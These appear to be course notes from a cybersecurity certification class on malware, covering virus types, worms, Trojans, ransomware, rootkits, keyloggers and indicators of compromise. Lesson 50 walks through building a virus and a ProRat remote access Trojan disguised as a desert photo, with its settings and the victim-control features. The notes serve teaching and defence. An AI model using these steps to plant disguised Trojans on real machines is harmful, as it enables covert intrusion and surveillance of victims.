Section 6:Malware

46: This course section covers malware, defining it as malicious software designed to infiltrate and
potentially damage computer systems without user consent. It explores threat vectors (methods of
infiltration) and attack vectors (means of gaining access and infecting systems). The analogy of a
cupcake infiltrating a house illustrates these concepts. The focus is on analyzing indicators of
malicious activity, including various malware types like viruses, worms, Trojans, ransomware, and
more. The WannaCry ransomware attack is cited as an example. The course also delves into malware
attack techniques and signs of a successful malware attack. A quiz is provided to reinforce learning.

47:

 Boot Sector Virus: Stored in the first sector of a hard disk, difficult to detect before the
operating system boots.
 Macro Virus: Embedded in documents like Word, Excel, or PowerPoint, exploiting user
actions.
 Program Virus: Targets executables or application files to infect with malicious code.
 Multipartite Virus: Combines boot sector and program viruses, ensuring persistence on
infected machines.
 Encrypted Virus: Hides by encrypting its code to evade detection by anti-virus software.
 Polymorphic Virus: Alters its code each time executed to avoid signature-based anti-virus
detection.
 Metamorphic Virus: Writes itself entirely before attempting to infect a file, an advanced form
of polymorphic virus.
 Stealth Virus: Uses techniques to avoid detection by anti-virus software, including encryption
and payload modification.
 Armored Virus: Adds layers of protection to confuse analysis attempts.
 Hoax Virus: A form of social engineering that tricks users into taking undesirable actions,
often by falsely claiming a virus infection.

48:

In this lesson, we delve into computer worms, a type of malicious software similar to viruses but with
a distinct characteristic. Unlike viruses that require user actions such as opening files or clicking on
links, worms can replicate themselves without user intervention. The key difference lies in the fact
that worms exploit vulnerabilities in operating systems and applications to spread across networks
autonomously.

Worms pose a dual threat. They can infect computing assets, and due to their self-replicating nature,
they can disrupt normal network traffic. By exploiting vulnerabilities, worms can rapidly spread
across networks, consuming network and computing resources. The constant replication process can
lead to denial-of-service attacks on networks and associated servers.

Historically, notable worms like Nimda (2001) and Conficker (2009) have demonstrated the
widespread impact of these threats. Nimda propagated across the internet in just 22 minutes, while
Conficker infected millions of machines by exploiting a critical security patch gap in Windows.

The key takeaway is that worms can self-replicate without user interaction, distinguishing them from
viruses. They actively search for network connections, scanning resources to exploit known
vulnerabilities and infect machines, emphasizing the importance of robust cybersecurity measures to
mitigate these threats.

49:

In this lesson, we explore Trojans, a type of malware named after the historical Trojan horse. In
ancient Greece, during a prolonged war, the Greeks presented the city of Troy with a large wooden
horse as a peace offering. However, the seemingly harmless gift concealed Greek soldiers who, once
inside the city walls, unleashed an attack, leading to Troy's downfall. In cybersecurity, Trojans work
similarly, disguising malicious software as harmless or desirable programs.

A Trojan, when executed, performs the claimed function but also carries out malicious activities, such
as installing backdoors or viruses. An example is the embedding of malicious code into a popular
game like Tetris distributed on floppy disks. This early form of a Remote Access Trojan (RAT) allowed
attackers to establish remote connections, gaining control over victimized machines.

RATs, a subtype of Trojans, provide attackers with remote control over compromised systems. The
lesson emphasizes the need for caution when downloading programs from the internet. Users should
employ anti-virus or anti-malware solutions to check for Trojans before installing any software.
Regular patching is crucial to preventing system vulnerabilities that Trojans exploit for unauthorized
access, data exfiltration, and other malicious activities.

50:

Virus Creation:

Tool Used: The instructor employs a program called "Virus Maker 3.0" or "JPS" for creating a virus.

Example: A simple virus named "Crazy Mouse" is demonstrated. The user selects options such as the
name after installation ("service host") and the file name ("Explorer.exe").

Execution: The virus is created and saved in the downloads folder.

Remote Access Trojan (RAT) Creation:

Tool Used: The instructor uses a program called "ProRat" to create a RAT server.

Settings: General settings, including port number (5110), server password (12345), and a fake error
message ("You have been hacked") are configured.

Server Creation: The ProRat server is created, and additional options, such as binding it with a
picture file, are demonstrated.

File Binding: The server is bound with a picture of a desert, given an EXE extension, and an icon is
selected.

Execution: The server is created in the current directory, and the resulting file is renamed to
"Desert."

Victim's Perspective:

Trickery: The instructor emphasizes that social engineering or trickery is used to get the victim to
download and run the file.

Effect: For the virus, a demonstration is shown where the mouse cursor becomes uncontrollable,
causing disruption.
RAT Execution: The victim opens the file thinking it's a photo of the desert. An error message
appears, indicating they have been hacked.

RAT Control:

Access: The instructor shows the ProRat interface on the attacking machine.

Information Gathering: System information, user details, date and time, and the last 25 visited
websites are displayed.

Remote Actions: The attacker can take screenshots, view the webcam (if available), and even send
messages to the victim's screen.

Manipulation: Examples include hiding desktop icons, making the mouse go crazy, flipping the screen
upside down, and sending messages to the victim's desktop.

51:

Key Points:

Definition of Ransomware:

Ransomware is the digital equivalent of kidnapping but focuses on digital data and information
assets.

It encrypts computer systems or data and demands payment for a decryption key.

Scale of Ransom Amounts:

Ransom amounts can vary, with some demands being low for individual users and multi-million
dollar demands for large organizations.

The Colonial Pipeline attack of 2021 is cited as an example where a fuel company paid $4.4 million in
Bitcoin to DarkSide attackers.

Real-world Consequences:

The Colonial Pipeline attack led to a shutdown, causing fuel shortages, panic buying, and increased
gas prices.

The University Hospital in Dusseldorf suffered a ransomware attack, resulting in the death of a
patient due to delayed emergency treatment.

Security Best Practices Against Ransomware:

Regular Backups:

Conduct regular backups of important data, files, and systems.

Store backups on physical devices and use cloud-based solutions to prevent them from being
encrypted during an attack.

Software Updates:

Install regular software updates, especially for the operating system and antivirus programs.
Patch vulnerabilities to prevent exploitation by attackers.

Security Awareness Training:

Provide security awareness training to end users.

Users should be cautious of unsolicited emails, especially those with attachments or links.

Multi-Factor Authentication (MFA):

Implement multi-factor authentication for an extra layer of security.

Makes it more challenging for attackers to breach user accounts and install ransomware.

Response to Ransomware Attacks:

Never Pay the Ransom:

Paying the ransom does not guarantee data recovery and supports criminal behavior.

It can make an organization a target for future attacks.

Isolate Infected Systems:

Immediately disconnect the infected machine from the network to prevent the spread of
ransomware.

Notify Authorities:

Ransomware attacks are considered criminal events and should be reported to the authorities.

Organizations should follow their incident response processes regarding reporting.

Restore from Backups:

Restore data and systems from known good backups.

Ensure that ransomware is completely removed before restoring critical data to prevent re-
encryption.

52:

Botnets:

Definition: A botnet is a network of compromised computers or devices controlled remotely by

malicious actors for cyber attacks or malicious activities.

Formation: Botnets are created by infecting systems with malware, turning them into zombies and
adding them to the botnet.

Control Mechanism: An attacker controls the botnet through a command and control node (C2
node).

Scale: Botnets can consist of hundreds, thousands, or even millions of compromised systems.

2. Zombies:

Definition: A zombie is a compromised computer or device that is part of a botnet and is used to
perform tasks using remote commands from the attacker.
Task Execution: Zombies carry out tasks assigned by the attacker without the user's knowledge.

Control Hierarchy: Zombies are under the control of a master node, and commands are transmitted
through the C2 node.

3. Botnet Activities:

DDoS Attacks: Distributed Denial of Service attacks involve multiple zombies targeting a victim
simultaneously, overwhelming systems and causing a denial of service.

Illegal Content Storage: Some attackers use botnets to store illegal content across numerous
compromised devices.

Spam and Phishing: Botnets are utilized to send spam emails and phishing campaigns to a wide range
of targets globally.

Crypto Mining: Attackers may command zombies to perform crypto mining, using their processing
power to mine cryptocurrency.

Breaking Encryption: Botnets' combined processing power can be employed to break through
different encryption schemes.

4. Crypto Mining and Botnets:

Economic Incentive: Attackers leverage the combined processing power of botnets for crypto mining,
gaining monetary benefits.

Avoiding Detection: To avoid detection, attackers typically use a portion (20-25%) of each zombie's
processing power, minimizing the impact on the user's machine.

5. Prevention and Awareness:

Detection Challenges: Attackers often avoid using all available processing power to prevent
immediate detection.

Security Measures: Users and organizations should implement security measures to prevent
machines from becoming part of a botnet.

Best Practices: Regular updates, security awareness training, and multi-factor authentication help
protect against malware and botnet infections.

53:

1. Rootkits Overview:

Definition: Rootkits are specific types of software designed to gain administrative-level control over a
computer system without detection.

Objective: Installation of a rootkit allows attackers to gain root or administrative-level permissions,

providing the highest level of control over the targeted system.

2. Administrative Permissions:

Windows vs. Unix/Linux/Mac OS: On Windows, the highest level of permission is held by the
administrator account, while on Unix, Linux, or Mac OS, it is the root account.
Power of Administrative Access: Administrative or root access grants the ability to install and delete
programs, manage ports, and perform various actions on the system.

3. Operating System Rings:

Security Rings: Computer systems have different rings of permissions, with user permissions in ring
three (outermost) and kernel mode (ring zero) having the highest permissions.

Kernel Mode: Kernel mode allows control over critical system components like device drivers, sound
cards, and video displays.

4. Rootkit Operations:

Targeted Rings: Rootkits aim to operate in ring one or even ring zero, maximizing their permissions
and potential damage.

Detection Avoidance: Rootkits move from ring one to ring zero to hide from the operating system
and avoid detection.

Challenges for Security Solutions: Rootkits are challenging to detect due to their deep integration
into the operating system.

5. DLL Injection:

Definition: DLL injection is a technique to run arbitrary code within another process's address space
by forcing it to load a dynamic-link library (DLL).

DLLs in Windows: DLLs, collections of code and data, are used by multiple programs simultaneously,
often provided within the Windows OS.

Malicious Code Insertion: Rootkits use DLL injection to insert malicious code into a running process,
exploiting the loading of DLLs at runtime.

6. Shim Technique:

Definition: A shim is a piece of software code placed between two components, intercepting and
redirecting their calls.

Rootkit Application: Rootkits use the shim technique to intercept communications between the
operating system and dynamic-link libraries, redirecting calls through embedded malicious code.

7. Detection and Removal:

Detection Challenges: Rootkits are challenging to detect because they operate deep within the
operating system, often rendering traditional antivirus solutions ineffective.

Effective Detection Method: The most effective method for detecting rootkits is to conduct an
external system scan using a live boot Linux distribution.

54:

1. Backdoors:

Definition: Originally placed in computer programs to bypass normal security and authentication
functions.
Historical Context: Common in the 1980s and 1990s for maintenance and repairs without going
through usual security layers.

Modern View: Considered a breach of secure coding practices; most software today avoids
backdoors.

2. Remote Access Trojans (RATs):

Nature: Acts like a backdoor; placed by threat actors to maintain persistent access.

Installation: Users tricked into clicking phishing links, leading to malware installation.

Functionality: Creates a callback connection, allowing the attacker to connect and bypass default
security measures.

3. Easter Eggs:

Definition: Insecure coding practice where programmers insert hidden features, jokes, or gags into
software.

Example: Google's "do a barrel roll" Easter Egg in the search application.

Security Implications: May introduce vulnerabilities due to additional code; not subjected to rigorous
security testing.

4. Logic Bombs:

Definition: Malicious code inserted into a program; executes when specific conditions are met.

Purpose: Typically more malicious than Easter Eggs; has harmful intent.

Example: Dennis Nedry's logic bomb in "Jurassic Park" designed to shut down power for theft.

5. Security Best Practices:

Backdoors: Should not be included in modern applications; considered a breach of secure coding
standards.

Easter Eggs: While generally harmless, may introduce vulnerabilities; avoid in critical applications.

Logic Bombs: Malicious and harmful; strict security measures should be in place to prevent them.

6. Secure Coding Standards:

Importance: Regular scanning of custom-developed applications to ensure compliance with secure

coding standards.

Avoidance: Backdoors, Easter Eggs, and logic bombs are discouraged in modern applications for
security reasons.

55:

1. Keyloggers:

Definition: Software or hardware that records every keystroke on a computer or mobile device.

Origin: Originally developed for troubleshooting by system administrators.

Evolution: Weaponized by cybercriminals to steal sensitive information from victims.

2. Types of Keyloggers:

Software-Based:

Malicious programs installed on a victim's computer.

Often bundled with other software or delivered through social engineering attacks.

Can evade antivirus detection, especially with sophisticated evasion techniques.

Operate silently in the background and transmit captured data to a remote server.

Hardware-Based:

Physical devices requiring connection to a computer.

Resemble USB thumb drives or embedded within keyboard cables.

Immune to software-based detection methods.

Effective in targeted attacks but harder to deploy on a large scale.

3. Risks Associated:

Personal Risks:

Unauthorized access to usernames, passwords, credit card numbers.

Potential for identity theft, financial fraud, and unauthorized transactions.

Business Risks:

Employees unwittingly compromising login credentials and sensitive data.

Financial losses, damage to the organization's reputation, legal repercussions.

Compromised proprietary data, confidential emails, or strategic plans.

4. Protective Measures:

Regular Updates and Patches:

Ensure systems and software are updated to prevent exploitation of known vulnerabilities.

Antivirus and Anti-Malware Solutions:

Invest in quality security software for detection and quarantine of keyloggers.

Conduct regular scans to detect any installed keyloggers.

Phishing Awareness Training:

Train end-users to be cautious about downloading attachments or clicking links from unknown or
untrusted sources.

Keyloggers are often distributed through phishing emails.

Multifactor Authentication (MFA):

Implement MFA across the enterprise network to add an extra layer of verification.
Even if passwords are captured, additional steps are required for access.

Keystroke Encryption:

Use security software that implements keystroke encryption.

Scrambles typed information before sending it over the system, making it unusable to threat actors.

Physical Checks:

Regularly inspect system hardware for unfamiliar devices, especially in sensitive environments.

Identify and remove any potential hardware-based keyloggers.

56:

1. Spyware:

Definition: Malicious software designed to gather and send information about a user or organization
without their knowledge.

Data Collection: Ranges from browsing habits to sensitive data like passwords and credit card
numbers.

Installation Methods:

Bundled with other software.

Installed through malicious websites.

Installed via deceptive pop-up advertisements.

Effects:

Invasion of privacy.

Slows down system performance as it continually monitors and transmits data.

Protection Measures:

Use reputable antivirus and anti-spyware tools regularly updated for threat detection and removal.

Download software only from trusted sources.

Read and understand End User Licensing Agreements (EULA).

Keep the operating system and software up to date to patch vulnerabilities.

2. Bloatware:

Definition: Software pre-installed on devices that users did not specifically request or need.

Origin: Often part of promotional partnership deals between manufacturers/vendors and software
companies.

Examples: Trial versions of applications, unnecessary toolbars, or promotional applications.

Effects:

Takes up storage space.

Uses system resources, affecting performance.

Introduces potential security vulnerabilities.

Mitigation:

Manually remove bloatware through system settings.

Use bloatware removal tools for comprehensive cleanup.

Perform a clean operating system installation when setting up a new device.

3. Removal of Bloatware:

Manual Removal:

On Windows, use the Programs and Features section in the Control Panel.

On smartphones or tablets, navigate to the app section in settings.

Bloatware Removal Tools:

Third-party tools available for more comprehensive removal.

Clean Operating System Installation:

Preferred by some as it ensures a device starts with only necessary software.

4. Best Practices:

Spyware Protection:

Regularly update and patch systems.

Use reputable security tools.

Exercise caution when downloading software.

Read and understand EULA.

Bloatware Management:

Regularly remove unused software to minimize attack surfaces.

Consider clean operating system installations on new devices.

57:

1. Evolution to Fileless Malware:

Historical Methods:

Modifying executable files or adding malicious macros to documents.

Infecting system memory, leveraging remote procedure calls for spreading.

Modern Approach:

Fileless malware techniques aim to bypass signature-based security systems.

Executes malicious code directly as a script or small shell code.

Creates a process in system memory without relying on the local file system.

Leaves fewer traces, making detection more challenging.

2. Fileless Malware Workflow:

Two-Stage Deployment Model:

Stage One (Dropper/Downloader):

Lightweight shell code executed on user interaction.

Initiates the installation of additional malware components.

Stage Two (Downloader):

Download and install a remote access Trojan (RAT).

Enables command and control over the victimized system.

Objective:

Establish access to the system.

Spread influence across the network.

3. Attacker Objectives:

Network Influence:

Compromise high-value targets (servers, domain controllers).

Expand permissions and footprint across the network.

Action on Objectives:

Execute primary objectives (data exfiltration, ransomware).

Concealment:

Hide tracks, erase log files, and eliminate evidence of malicious activities.

4. Malware Delivery Techniques:

Various Methods:

Code injection, masquerading, DLL injection, DLL sideloading, process hollowing.

Anti-forensic strategies: encryption, compression, obfuscation.

Code Injection Example:

Running malicious code with the identification of a legitimate process.

5. Living Off the Land:

Strategy:

Exploit standard system tools for malicious activities.

Utilize default tools installed on the operating system.

Example: PowerShell:

Manipulated for various malicious activities.

Detection becomes challenging as it leverages internal PowerShell commands.

Awareness:

Cybersecurity professionals must be aware of such techniques.

Importance of staying updated on emerging threats.

58:

1. Account Lockouts:

Indicator:

Multiple failed login attempts triggering user account lockouts.

Significance:

Credential theft or brute force attacks may be in progress.

Unusual surge in locked accounts across the enterprise network.

2. Concurrent Session Utilization:

Indicator:

Single user account having multiple simultaneous sessions.

Significance:

Potential hijacking of user accounts for malicious activities.

Especially concerning if sessions are from various geographic locations.

3. Blocked Content:

Indicator:

Increase in alerts for blocking known malicious content.

Significance:

Possible penetration of the system by malware.

Security tools are actively blocking malicious files or links.

4. Impossible Travel:

Indicator:

User account accessed from geographically separated locations in a very short time.

Significance:

Indication of compromised user accounts.

Often a result of successful malware attacks harvesting user credentials.

5. Resource Consumption:

Indicator:

Unusual spikes in CPU, memory, or network bandwidth utilization.

Significance:

Presence of malware, especially Cryptominers, botnets, or worms.

High resource consumption leading to system slowdowns.

6. Resource Inaccessibility:

Indicator:

Files or critical systems becoming inaccessible, often with a ransom demand.

Significance:

Clear sign of a ransomware-based malware attack.

Files encrypted, demanding payment for decryption.

7. Out-of-Cycle Logging:

Indicator:

System logs generated at odd hours or during inactive periods.

Significance:

Potential indication of unauthorized data transfers or system modifications.

Review logs regularly to detect such infections.

8. Missing Logs:

Indicator:

Large gaps in logs or logs cleared without authorized reason.

Significance:

Threat actor attempting to hide their tracks after a successful breach.

Indicates malicious activity or a malware attack.

9. Published or Documented Attacks:

Indicator:

Reports by cybersecurity researchers or reporters highlighting your organization's network infection.

Significance:

External confirmation of a malware-based attack.

A clear indication that your organization has been targeted.